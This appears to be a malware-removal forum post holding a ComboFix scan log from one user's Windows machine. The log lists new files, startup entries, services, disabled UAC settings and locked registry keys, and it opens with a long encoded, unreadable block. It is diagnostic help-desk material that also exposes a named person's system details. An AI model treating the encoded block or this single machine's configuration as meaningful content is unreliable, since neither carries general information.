Nxp`s$pio~pis~}j4vis^xKu^SITVGJZ*/mjwxp`s~}jwA}jwA} ^3IssA9xw" NxI:Ap?iH~pis~}jwA}iwAp+3S.TVG}0*!mjwx+^9\t!^A}jwA}iwAp`oAUFtU NxK:Ap?iHVKV}a}9A}iwApio~pis~[:V!mjwW.w9\t!^L\s99}TwAp`oA5js~}isA5NAp?iH&KV}a}^jis^x?io~pis~}`s$5jwpH89\t!^D\s99}TXrIssA\!s~}is~p`s$pio&riwa}^vis^x?P)S.TVG}`s$5jwAp`s~}jAD\M89}TlrIssAmxwU Nxp`s$pio~pis~}j9piq^x?PLS.TVGi0*!mjwxp`s~}jwA}jwA} \!?ssAmFIU Nxp`s$pio~pis~}jwA}iwApio~pis~}`s$5jwMl^9\t!aX\s99}TwAp`oAUVAU Nxp`s$pioVNTs~t!wA}iwApfLS.TVG}`s$5jw1}^9\t!^A}jwA}Pj!IssA\!s~}is~?.AO?iH~pis~}jgEiq^x?io~pis~i2IFmjwxp`s~}jx&\M89}TwAp`oAUw: Nxp`s$pio~pis~}jwA}iwApio~pis~}`s/Usa5j0*b\V&6e39j#^(1qOk"F};}is~pjqz.%$j?3wy K~MCqaq?haNHTF~i.A `F"D.0Fgn3^Fi3jcPiwC1:$l"&t.P!FUmy9$pio~IT5SeLxD}#I6KpsI+VFlPVFj1 xAp^I:](45i.\ZjVXYj Hk5js~}i}}HV1dK%$NlT.~#L~/Pqg.1itqp".Me0Nf5jwAp0wb8Vx/e ZF8!"sK s}j!*H#stnm8s]psHjIi*:#3"I[#aC+uH~pis~#^t 1sasK Vm#!Ih V\r8!g5.sak(V9S #N2pqspH 4mHs}7e34A[#aC+uH~pis~i:9G(s0XNwI0#ywr .4Z[qa(j0[tj&tk}i};.ws pV2tlq9g#2wA}iws}!a0IPsKeZt/(sas Ab]F\n .168o\&p^t.ts}:isj8.Z6OjUHbpis~}jjrn#a(I%$m.#}8tVFd&X1oIm#y`hi8c[s0XmZoIj.9oi#};?0F?p#mIft.}jwA}#jY.hX"HUtye.9 :sa5lZsb\x4/P(a9[#aC+_HA5js~iPql?s9O49$4.T}.e.4h83wCI!1~pis~}`}U":l&?`s~j(g&}?OA^U99NbOl1K1;H3slK_V!pf]dr!NA6s^ j#I6IV2alq28}s,U"j85G9a6wHnkDWeTwAp`o5(M,H[TVMI`Fzj#odrisHn." j+g*5iAH5pt;j^bT}f\q_V"Hs~Z}3khPu9q}Z[n}2w+H ..IZ2*K%}.NqAGjy4njsx +U(XN N~}`s$5.T!?At$iZR\Jy92^uwXlqBA\!s~^jY p`s$pioop#.N}9A}P\INTH~pi9qCUYX"f9ZjZY~8s^v6D}H "Il`2j\31x}#VkHUYHVe7NTs5CCj1}VwAps]q13qlJ2N9U!"2?NAAj(~sP9q}P\I.A3!5.sdni.4IwwhjioaIPHM]f9l]rR!N9sGpf5ZPH,%`M1 p`9~}jgsn.ADjV\&I`oAUjqlJfNGKAt3?%$~r3tH}3^qCrR\ro$~I s;ts}253gAp`saJ&"vjjlq[%^yK`B35V1;Hj%W?As$pi}W?it&tFwA}iw9p%37NTtHi.I}(:IDNA} F!82[ `c}+1DmZo3"MItt310KVI/.Va0.3Y;H?R\JTw&pTX0I3s;ty1V5VxAp`2y6ZDZH?RcJTwApZBct2.w}is;I.}*IT(8S"tA}jwA]949j34"}p.+tHY%dF&!pN37[!&h}FAD\T42KA( 9FIH]3I55^w-m+Hg4Tt$J&1c}iwA|"BU}rY~tV5*53A\pZ62Hs~x]f"pH35yj`t;j:NAHUwKIyNhNr1ANTs~t2w;}%\&jT]2+36HjNI/}?O&pNAA (gsP(gq8Txf;0\9!s~HUN"j_IfjpsU4"9\].ws}iws5i(M+3s;}js/tsT!NA5M}&\qCM"!\ow\NGVc5.A&C#5.my3aH"]a}+W7i:\w}jrhhfhappnstvj.uf":129njj&*j&9aiu"wn2s35ka5[!y"+`s%?ub;kit }3w 0yh"]ahot2j.aegm^zn.iu[l^m6jl2c!1yh.$fut}j+mmkqf+1z07|finpk4ahox:rp$w1uawpo}"fx:rasntx9a}jw2}%"a.0^ 9&tdcpa"+uyx3oants~\Mjf]9"5r3]l?Psw}8s2"x9qjjNa[&9*CKAyH!0yH2[xtsoZ}VV5IZ9oli2Ap%3XH:1D\sx:|Ta`j NHn`I+25!?qo7[kR\ fwFPox:lV#*I!Vw}i,DljNFH"sWIus0JF"1}VwApiowpis~}`6/mjwxp`s~}3wA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAn:!bFKD4#^E[9tX8qN&ZI7^9!SrHt8jfs.N!.DJVxF8U"w4 i!? *Zto9-1sgVm }ae jyJ38t^UgW5qaN}Lw_tpIA}q6s}+oZ}i}7^3\F8hg!l 1!j!,a8 Is1kTW}y2TC jX8:j/\"&E}Va/&s}a^UI85q6}mh1Z} 1ZF?SWt+5op/4(pUVZtjY[o?X4.`V![ftXp?X4#i^ENG\Xo?6(#iV!NGHzqq9|jbK !^E[o~!msTa|j3aJ0V;9:OD}Uo0^ZS6HLAy\rSh+G}hdZI7^/3F|wYP+pHZ} !!ixjE[!^Y}jXx4UI^^s,A` jXNsVNt(tEPwX^+4t4wTv}3N^[3I^4V.U5p]^Ih,H]xjEef"w4+X54+V![V.znZ4x5UA8^ jX\y&Et!X/qAHt(M6oC *042N}mh1Npj3kFM93(3zWTBlN!.(pj!dq!x*NV.(p.Z/ Fj98U5yH^T/qF.x8Up.H^!dq#x4Up.\VZw(/44? XZjuIHpU32n?0E?q*y8 DVFZ"hJ/"hSG)/tZhSFPYO5ysT5+4F0PY^nM^!vb*#JIn{l I!UvwQrPb+6,^U\=lE~Z~qbp8mmOm4`+*`N8pm^Wd+cbpvkkpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-08-11 to 2014-09-11  )))))))))))))))))))))))))))))))
.
.
2014-09-11 16:09 . 2014-09-11 16:10 -------- d-----w- c:\users\Paul\AppData\Local\temp
2014-09-11 16:09 . 2014-09-11 16:09 -------- d-----w- c:\users\Paul Silliman\AppData\Local\temp
2014-09-11 16:09 . 2014-09-11 16:09 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-10 19:20 . 2014-09-10 19:39 -------- d-----w- C:\FRST
2014-09-10 18:35 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-10 17:16 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-10 17:13 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-10 17:13 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-10 17:07 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-10 16:55 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-10 16:55 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-10 14:05 . 2014-09-10 14:05 -------- d-----w- c:\program files\CCleaner
2014-09-09 19:57 . 2014-09-09 20:01 -------- d-----w- C:\SERT
2014-09-06 13:16 . 2014-09-10 15:13 110296 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-09-06 13:14 . 2014-09-06 13:14 -------- d-----w- C:\found.000
2014-09-06 12:29 . 2014-05-12 12:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-06 12:29 . 2014-05-12 12:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-06 12:29 . 2014-09-06 12:29 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-06 11:50 . 2014-09-06 11:50 65 ---ha-w- c:\windows\system32\38891.bat
2014-08-29 15:21 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-08-29 15:21 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-08-29 15:21 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-08-29 15:21 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-08-29 15:18 . 2014-07-14 01:42 654336 ----a-w- c:\windows\system32\rpcrt4.dll
2014-08-29 15:18 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-29 15:18 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-08-29 15:18 . 2014-06-03 09:29 2363392 ----a-w- c:\windows\system32\msi.dll
2014-08-29 15:18 . 2014-06-03 09:29 1805824 ----a-w- c:\windows\system32\authui.dll
2014-08-29 15:18 . 2014-06-03 09:30 101824 ----a-w- c:\windows\system32\consent.exe
2014-08-29 15:18 . 2014-06-03 09:29 337408 ----a-w- c:\windows\system32\msihnd.dll
2014-08-29 15:18 . 2014-07-16 02:46 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-29 15:18 . 2014-06-16 01:44 730048 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-29 15:18 . 2014-06-16 01:44 219072 ----a-w- c:\windows\system32\drivers\dxgmms1.sys
2014-08-29 15:18 . 2014-06-16 01:40 107520 ----a-w- c:\windows\system32\cdd.dll
2014-08-23 11:25 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-08-23 11:25 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
2014-08-23 11:24 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-08-23 11:24 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-08-23 11:24 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-08-23 11:24 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-08-23 11:24 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-08-23 11:24 . 2014-05-14 14:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
2014-08-23 11:24 . 2014-05-14 14:17 33792 ----a-w- c:\windows\system32\wuapp.exe
2014-08-22 14:32 . 2014-08-22 14:32 -------- d-----w- c:\programdata\{15443AB6-DA1B-46B5-A9BB-1311ED40AB1A}
2014-08-22 14:30 . 2013-09-23 18:48 147912 ----a-w- c:\windows\system32\drivers\HipShieldK.sys
2014-08-19 12:46 . 2014-08-19 12:46 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-19 12:46 . 2014-08-19 12:46 -------- d-----w- c:\program files\iPod
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-10 13:55 . 2012-04-13 10:42 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-10 13:55 . 2011-09-19 16:22 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-08-28 10:29 . 2010-06-24 16:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-12 13:10 . 2011-09-19 16:28 51712 ----a-w- c:\windows\system32\wltrynt.dll
2014-08-12 13:10 . 2011-09-19 16:28 457 ----a-w- c:\windows\system32\vcredist_x86.bat
2014-08-12 13:10 . 2011-09-19 16:28 2682880 ----a-w- c:\windows\system32\vcredist_x86.exe
2014-08-12 13:10 . 2011-09-19 16:28 50704 ----a-w- c:\windows\system32\drivers\npf.sys
2014-08-12 13:10 . 2011-09-19 16:28 6656 ----a-w- c:\windows\system32\bcmwlrc.dll
2014-08-12 13:10 . 2011-09-19 16:28 7348224 ----a-w- c:\windows\system32\BCMWLCPL.CPL
2014-08-12 13:10 . 2011-09-19 16:28 57344 ----a-w- c:\windows\system32\bcmwlrmt.dll
2014-08-12 13:10 . 2011-09-19 16:28 1022976 ----a-w- c:\windows\system32\BCMLogon.dll
2014-08-12 13:10 . 2011-09-19 16:28 4513792 ----a-w- c:\windows\system32\bcmttls.dll
2014-08-12 13:10 . 2011-09-19 16:28 18424 ----a-w- c:\windows\system32\drivers\bcm42rly.sys
2014-07-25 07:35 . 2014-07-25 07:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-06-18 01:51 . 2014-07-11 10:46 646144 ----a-w- c:\windows\system32\osk.exe
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2014-06-27 19:27 1020624 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2014-06-27 19:27 1020624 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2014-06-27 19:27 1020624 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EnabledUnlockedFDEIconOverlay]
@="{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}"
[HKEY_CLASSES_ROOT\CLSID\{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}]
2011-12-08 15:38 121208 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MOBK]
@="{3c3f3c1a-9153-7c05-f938-622e7003894d}"
[HKEY_CLASSES_ROOT\CLSID\{3c3f3c1a-9153-7c05-f938-622e7003894d}]
2010-04-14 01:11 2872120 ----a-w- c:\program files\McAfee Online Backup\MOBKshell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MOBK2]
@="{e6ea1d7d-144e-b977-98c4-84c53c1a69d0}"
[HKEY_CLASSES_ROOT\CLSID\{e6ea1d7d-144e-b977-98c4-84c53c1a69d0}]
2010-04-14 01:11 2872120 ----a-w- c:\program files\McAfee Online Backup\MOBKshell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MOBK3]
@="{b4caf489-1eec-c617-49ad-8d7088598c06}"
[HKEY_CLASSES_ROOT\CLSID\{b4caf489-1eec-c617-49ad-8d7088598c06}]
2010-04-14 01:11 2872120 ----a-w- c:\program files\McAfee Online Backup\MOBKshell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\UninitializedFdeIconOverlay]
@="{CF08DA3E-C97D-4891-A66B-E39B28DD270F}"
[HKEY_CLASSES_ROOT\CLSID\{CF08DA3E-C97D-4891-A66B-E39B28DD270F}]
2011-12-08 15:38 121208 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-01-31 137752]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-01-31 171032]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-01-31 172568]
"IAStorIcon"="c:\program files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" [2010-11-06 283160]
"Broadcom Wireless Manager UI"="c:\program files\Dell\DW WLAN Card\WLTRAY.exe" [2014-08-12 4685824]
"RemoteControl9"="c:\program files\CyberLink\PowerDVD9\PDVD9Serv.exe" [2009-07-06 87336]
"PDVD9LanguageShortcut"="c:\program files\CyberLink\PowerDVD9\Language\Language.exe" [2010-04-29 50472]
"mcui_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2014-07-09 514832]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-18 254696]
"mcpltui_exe"="c:\program files\Common Files\McAfee\Platform\mcuicnt.exe" [2014-07-07 496768]
"BrMfcWnd"="c:\program files\Brother\Brmfcmon\BrMfcWnd.exe" [2009-02-10 745472]
"ControlCenter3"="c:\program files\Brother\ControlCenter3\brctrcen.exe" [2007-10-30 77824]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"SoundMAXPnP"="c:\program files\Analog Devices\Core\smax4pnp.exe" [2011-02-24 1314816]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"Carbonite Backup"="c:\program files\Carbonite\Carbonite Backup\CarboniteUI.exe" [2014-06-27 1056976]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 0 (0x0)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableVirtualization"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\spba]
2010-09-15 16:11 1971536 ----a-w- c:\program files\Common Files\SPBA\homefus2.dll
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Authentication Packages REG_MULTI_SZ   msv1_0 wvauth
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc]
@=""
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
backup=c:\windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Seagull Drivers]
ssdal_nc.exe startup [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2013-11-21 16:57 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ApnUpdater]
2012-01-03 22:31 1391272 ----a-w- c:\program files\Ask.com\Updater\Updater.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
2011-09-28 11:50 136176 ----atw- c:\users\Paul\AppData\Local\Google\Update\GoogleUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TdmNotify]
2011-12-08 15:37 323952 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
.
R3 BBSvc;Bing Bar Update Service;c:\program files\Microsoft\BingBar\BBSvc.EXE [2011-06-07 191752]
R3 BrSerIb;Brother MFC Serial Interface Driver(WDM);c:\windows\system32\DRIVERS\BrSerIb.sys [2009-07-14 265088]
R3 BrUsbSIb;Brother MFC Serial USB Driver(WDM);c:\windows\system32\DRIVERS\BrUsbSIb.sys [2009-07-13 11904]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 HipShieldK;McAfee Inc. HipShieldK;c:\windows\system32\drivers\HipShieldK.sys [2013-09-23 147912]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-08-18 108032]
R3 mfefirek46;McAfee Inc.;Device\mfefirek46.sys [x]
R3 mfefirek50;McAfee Inc.;Device\mfefirek50.sys [x]
R3 mfencrk;McAfee Inc. mfencrk;c:\windows\system32\DRIVERS\mfencrk.sys [2014-03-18 81264]
R3 netvsc;netvsc;c:\windows\system32\DRIVERS\netvsc60.sys [2010-11-20 126464]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2012-08-23 14848]
R3 SynthVid;SynthVid;c:\windows\system32\DRIVERS\VMBusVideoM.sys [2010-11-20 19456]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2013-10-02 49152]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-09-29 1343400]
R3 WvPCR;WvPCR;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [2012-01-16 145408]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 51040]
S0 mfewfpk;McAfee Inc. mfewfpk;c:\windows\system32\drivers\mfewfpk.sys [2014-05-02 215624]
S1 MOBKFilter;MOBKFilter;c:\windows\system32\DRIVERS\MOBK.sys [2010-04-14 54776]
S2 BBUpdate;BBUpdate;c:\program files\Microsoft\BingBar\SeaPort.EXE [2011-05-12 249648]
S2 EmbassyService;EmbassyService;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [2012-01-17 179592]
S2 HomeNetSvc;McAfee Home Network;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2010-11-06 13336]
S2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2013-06-28 14624]
S2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\Common Files\Mcafee\McSvcHost\McSvHost.exe [2012-08-31 167784]
S2 McAPExe;McAfee AP Service;c:\program files\McAfee\MSC\McAPExe.exe [2014-07-09 527168]
S2 McMPFSvc;McAfee Personal Firewall Service;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 McNaiAnn;McAfee VirusScan Announcer;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 mcpltsvc;McAfee Platform Services;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 mfecore;McAfee Anti-Malware Core;c:\program files\Common Files\McAfee\AMCore\mcshield.exe [2014-03-18 655936]
S2 mfefire;McAfee Firewall Core Service;c:\program files\Common Files\McAfee\SystemCore\\mfefire.exe [2014-05-02 169800]
S2 mfevtp;McAfee Validation Trust Protection Service;c:\windows\system32\mfevtps.exe [2014-05-02 179600]
S2 MOBKbackup;McAfee Online Backup;c:\program files\McAfee Online Backup\MOBKbackup.exe [2010-04-14 229688]
S3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [2014-05-02 61400]
S3 e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K;c:\windows\system32\DRIVERS\e1k6232.sys [2009-11-06 214696]
S3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [2014-05-02 367776]
S3 mfencbdc;McAfee Inc. mfencbdc;c:\windows\system32\DRIVERS\mfencbdc.sys [2014-03-18 345584]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-11 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-13 13:55]
.
2014-09-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-10-01 12:29]
.
2014-09-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA1cf8e2452dd23be.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-10-01 12:29]
.
2014-09-10 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001Core1cf4b42484e052c.job
- c:\users\Paul\AppData\Local\Google\Update\GoogleUpdate.exe [2011-09-28 11:50]
.
2014-09-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001UA1cf6ba7e2bf6cd8.job
- c:\users\Paul\AppData\Local\Google\Update\GoogleUpdate.exe [2011-09-28 11:50]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.yahoo.com/?ilc=17
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~3\Office14\ONBttnIE.dll/105
TCP: DhcpNameServer = 192.168.169.12 192.168.169.17
TCP: Interfaces\{BAB2BA9C-F1CF-414A-A0DE-EA9AD3591E6F}: NameServer = 8.8.8.8,8.8.8.8
TCP: Interfaces\{BC0EE8A6-7D0A-4656-BE50-121CC3D7E979}: NameServer = 8.8.8.8,8.8.8.8
DPF: {8F2EACD9-51A6-4915-B9AD-2AA8657CB472} - hxxps://webpostage.stamps.com/webpostage/plugin/SdcWebClientServices.cab
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Notify-GoToAssist Express Customer - c:\program files\Citrix\GoToAssist Remote Support Customer\594\g2ax_winlogon.dll
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-296848781-3995833910-2275520707-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-2770843)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'lsass.exe'(664)
c:\windows\system32\wvauth.DLL
.
Completion time: 2014-09-11  11:12:28
ComboFix-quarantined-files.txt  2014-09-11 16:12
.
Pre-Run: 408,154,935,296 bytes free
Post-Run: 415,009,812,480 bytes free
.
- - End Of File - - 7EF9A1C201C368B5A2D718DE642D4C72
5C616939100B85E558DA92B899A0FC36


#6 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:46 PM

Posted 11 September 2014 - 11:55 AM

